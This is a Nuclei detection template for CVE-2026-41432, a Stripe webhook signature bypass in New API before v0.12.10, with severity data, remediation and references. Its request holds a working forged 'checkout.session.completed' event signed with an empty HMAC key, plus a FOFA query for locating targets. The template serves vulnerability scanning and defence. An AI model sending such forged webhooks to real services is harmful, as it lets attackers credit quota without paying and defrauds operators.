Description
New API < v0.12.10 contains a broken authentication caused by unauthenticated attacker forging Stripe webhook events, letting attackers credit arbitrary quota without payment, exploit requires no authentication.
New API < v0.12.10 contains a broken authentication caused by unauthenticated attacker forging Stripe webhook events, letting attackers credit arbitrary quota without payment, exploit requires no authentication.
id: CVE-2026-41432
info:
name: New API < v0.12.10 - Stripe Webhook Bypass
author: str4k3r
severity: high
description: |
New API < v0.12.10 contains a broken authentication caused by unauthenticated attacker forging Stripe webhook events, letting attackers credit arbitrary quota without payment, exploit requires no authentication.
impact: |
Unauthenticated attackers can credit arbitrary quota to their account without payment, causing financial and resource abuse.
remediation: |
Update to version 0.12.10 or later.
reference:
- https://github.com/advisories/GHSA-xff3-5c9p-2mr4
- https://nvd.nist.gov/vuln/detail/CVE-2026-41432
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L
cvss-score: 7.1
cve-id: CVE-2026-41432
epss-score: 0.0085
epss-percentile: 0.56379
cwe-id: CWE-345
metadata:
max-request: 1
verified: true
fofa-query: 'icon_hash=="-1398762159"'
tags: cve,cve2026,new-api,stripe,webhook,auth-bypass
variables:
timestamp: "{{unix_time()}}"
event_body: '{"type":"checkout.session.completed","data":{"object":{"client_reference_id":"nuclei-probe","status":"complete","payment_status":"paid","customer":"cus_probe","amount_total":0,"currency":"usd"}}}'
signature: '{{hmac("sha256", concat(timestamp, ".", event_body), "")}}'
http:
- raw:
- |-
POST /api/stripe/webhook HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Stripe-Signature: t={{timestamp}},v1={{signature}}
{{event_body}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_any(tolower(body), "webhook handled", "\"success\"", "\"status\":\"success\"")'
- '!contains_any(tolower(body), "<html", "not found", "error", "forbidden", "unauthorized", "invalid signature")'
condition: and
# digest: 4a0a0047304502203151096100abd1cbc9bb41bbd01e0015e1da6b7a77858a219e191a7dbd961abc022100eece49babe1d721ba77e9dab107c8b521f4e8cd72f894d7384068b80f2455514:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.